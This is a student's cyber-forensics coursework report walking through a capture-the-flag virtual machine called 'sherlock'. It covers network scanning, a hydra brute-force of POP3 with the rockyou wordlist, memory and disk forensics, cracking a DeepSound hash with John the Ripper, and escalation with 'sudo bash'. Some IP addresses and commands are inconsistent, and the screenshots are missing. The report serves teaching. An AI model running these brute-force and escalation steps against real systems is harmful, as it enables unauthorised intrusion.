IT

DEPARTMENT OF CS & IT

Activity-II
Cyber Forensic
(22MCAIS302)

Name: Mohammed Taha Alibhai

USN No.: 22MCAR0033
Semester: III
Course: MCA -ISMS
Submitted to: Professor Mohammed Tousif
 Certificate
This is to certify that Mohammed Taha Alibhai satisfactorily
completed the course of Assignment/Activity 2 prescribed by the Jain
(Deemed-to-be University) for the Semester-III M.C.A degree course
inthe year 2022-24.

USN No: 22MCAR0033

Date: 10/09/2023

M.Taha
Signature of Student Head of the Department Signature of Faculty
CTF Report

Prerequisites:

1) VMWare Workstation or VirtualBox

2) Kali Linux
3) Configure Kali Linux Network Settings to work on bridged connections
4) WIFI/Ethernet Connection

Step 1: Installing the system

Download the system from

https://drive.google.com/file/d/1UQMOphUUezNWwwTXGvdcMO1aLboETt6w/view, extract the
archive, open "sherlock.ova" to launch it in VMware or VirtualBox, and install it on your machine.
Then, launch the system to see the expected screen.

Step 2: Scanning

Start Kali Linux, open the terminal, and enter "sudo su" to gain superuser privileges for admin-level
operations. Enter your password to obtain root permissions, then run the "netdiscover" command.

Netdiscover is a network reconnaissance tool used to discover and list devices on a local network by
actively sending ARP (Address Resolution Protocol) requests. It helps identify connected devices,
their IP addresses, and MAC (Media Access Control) addresses.

Once the scanning process is complete, you should observe the following output:

Since we're running our system on VMware, we're searching for the MAC vendor/hostname
"VMware." Our Kali Linux machine is on VMware too but isn't listed because Kali ignores its own IP
address by default.

With the acquired IP address of the system, we can proceed to conduct an in-depth machine scan
utilizing the Nmap tool. Use the command nmap -sV <IP Address>
Nmap is a powerful open-source network scanning and reconnaissance tool used to discover devices,
services, and their configurations on a network.

-sV: This is a command-line option in Nmap. When you use "-sV," it instructs Nmap to perform
service version detection. In other words, it tries to identify the specific software and version of the
services (like web servers, FTP servers, or SSH servers) running on the target host. This information
can be crucial for assessing potential vulnerabilities and ensuring that software is up-to-date and
secure.

In our example above, the IP of our system is 192.168.1.18.

We shall use the command: nmap sV 192.168.0.28

Output:

The scan reveals several weaknesses:

1) An open http port

2) An open ssl port
3) An open pop3 port

Step 4: Enumeration

We will start with the http port. Enter the IP Address 192.168.0.28 into your browser. This will open
the following webpage:
The next step is to go through the contents to find any hints in the contents. The contents of the site
tell us this system was owned by Harshit. We shall proceed to examining the source code of the site
for any hints/clues in the source code.

Right click on the site and click on view page source. The source code gives us the following hint at
the very bottom of the page

We can search the url for a file called irene.mp4. This leads to the following file

The contents of the file do not yield any results. However, we can check the possibility of
steganography. For now we can try to open the ssh port using harshit’s username as we are aware
this is his system

Connecting to the ssh port gives us the following screen:

The presence of morse code on the screen could be another hist. decrypting the morse code gives us
the value: BASKERVILLE. We can use the key BASKERVILLE to decrypt the irene.mp4 file. This yields
our first flag for 15 points

We can now bruteforce into the POP3 mail to search harshit’s mail for additional clues
Use the following hydra command to bruteforce the password for POP3:

hydra -l harshit -P /usr/share/wordlists/rockyou.txt 192.168.0.28 pop3s

1. hydra: This is the command to invoke the Hydra tool.

2. -l harshit: This flag specifies the username to be used for the brute-force attack. In this case,
the username is set to "harshit."

3. -P /usr/share/wordlists/rockyou.txt: This flag specifies the password list to be used for the
brute-force attack. In this case, the tool is using the "rockyou.txt" wordlist file located at
"/usr/share/wordlists/rockyou.txt." The RockYou wordlist is a commonly used list of
passwords.

4. 192.168.0.28: This is the target IP address or hostname of the SSH server that the attacker is
trying to gain access to.

5. pop3s: This is the protocol and service to target.

Bruteforcing the pop3 port yields the following output above. We can now inspect the POP3 port to
search Harshit’s Mails. To log into the POP3 port, use the following command:

openssl s_client -crlf -connect 192.168.0.28:110 -starttls pop3

1. openssl: This is the command-line tool for OpenSSL, a widely-used open-source

cryptographic library that provides various tools for working with SSL/TLS protocols and
certificates.

2. s_client: This is a subcommand of OpenSSL used for creating a generic SSL/TLS client
connection. In this case, it's used to connect to an email server as a client.

3. -crlf: This option tells openssl s_client to use CRLF (Carriage Return Line Feed) line endings
for communication with the server. This is common for email protocols, where lines are
typically terminated with CRLF.

4. -connect 192.168.0.28:110: This option specifies the server's IP address (192.168.0.28) and
port number (110) to which the openssl client should connect. Port 110 is the default port
for POP3.

5. -starttls pop3: This option instructs the client to use the STARTTLS extension to upgrade the
connection to a secure SSL/TLS connection after the initial connection is established. The
"pop3" argument indicates that it's a POP3-specific STARTTLS command, meaning it's used to
secure the communication for the POP3 email protocol.
The command yields the following output:

Enter the command user and enter the username as harshit, then pass and enter the password as
superman

Once you are logged in, enter the command retr 1 to retrieve the most recent email. This gives us the
following result

We can then enter retr 2. This yields:

We can then enter retr 3. This yields:

In this email, we can find 2 hints:

1) A timestamp
2) The keyword epoch
The keyword epoch implies the timestamp holds more value than it seems, if we pass this timestamp
to an epoch converter, we can observe the following directory

Step 5: Vulnerability Analysis

We can now analyse this memory file using the volatility framework. Volatility framework doesn’t
come preinstalled in kali linux. You can follow the following guide to install volatility on kali:

https://seanthegeek.net/1172/how-to-install-volatility-2-and-volatility-3-on-debian-ubuntu-or-kali-
linux/

Once volatility is installed, use the the following command

Python2 vol.py -f john.mem imageinfo

We have used python2 as volatility is not fully compatibility with python3. The "imageinfo" plugin is
used to gather basic information about the memory dump, such as the profile, the operating system
version, and the architecture.

This analysis tells us the operating system being used was windows XP, we can now try the notepad
plugin
To use the notepad plugin, replace imageinfo with notepad as follows

Python2 vol.py -f john.mem notepad

The text we have found seems encrypted, we can put it through a rot13 converted to observe any
output

We did observe an open FTP port in the nmap scan. We can try logging into the ftp port using the
username as john and the password as Guptchar.

Use the command ftp followed by the ip address to login into the ftp port.
Now that we are inside the ftp port, we can perform ls to find any hidden directories and files

We can observe a directory called files, we can cd into that directory and find 2 files

1) 10_Points.txt
2) Mycroft.001

The name of the 2nd file implies it is an image as such we can use autopsy to analyze this disk
imagine, use the command get to load the file into your system

We can now load the file into autopsy for further analysis.

The directory analysis in autopsy gives us the following result:

We can observe this image for 2 clues, one is the number 16 highlighted in red. Converting 16 from
hexadecimal to decimal gives us 22. The second clue is the hexadecimal values highlighted in green

Converting these values to text gives us the value Khufiya. We can now try logging into the ssh port
on port 22 using the username as Mycroft and password as Khufiya
Step 6: Exploitation

Use the command: sftp username@remote_server_ip

We will use: sftp [email protected]

Enter the password as Khufiya

Once we are in the system, the ls command tells us there are 2 files

1) 15_points.txt
2) jim.wav

When we put the sound file into a tool called Audacity, we get the following hint
So, let’s use deepsound2john.py, to convert .wav file to hash file. And the file is brute-force using
John the ripper

/usr/share/john/deepsound2john.py jim.wav > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

john hash –show

We can now use the deepsound software to decrypt this audio file.

This gives us the following 2 files:

The creds.txt contains the following set of characters: QmhlZGl5YQ==

We can now use a base64 decryption tool to decrypt the text. This gives us the phrase Bhediya

We can now attempt to login into the system as a superuser using the password Bhediya
Step 7: Escalation of Privilege

Login Successful, run the following set of commands to elevate to root

sudo -l

sudo bash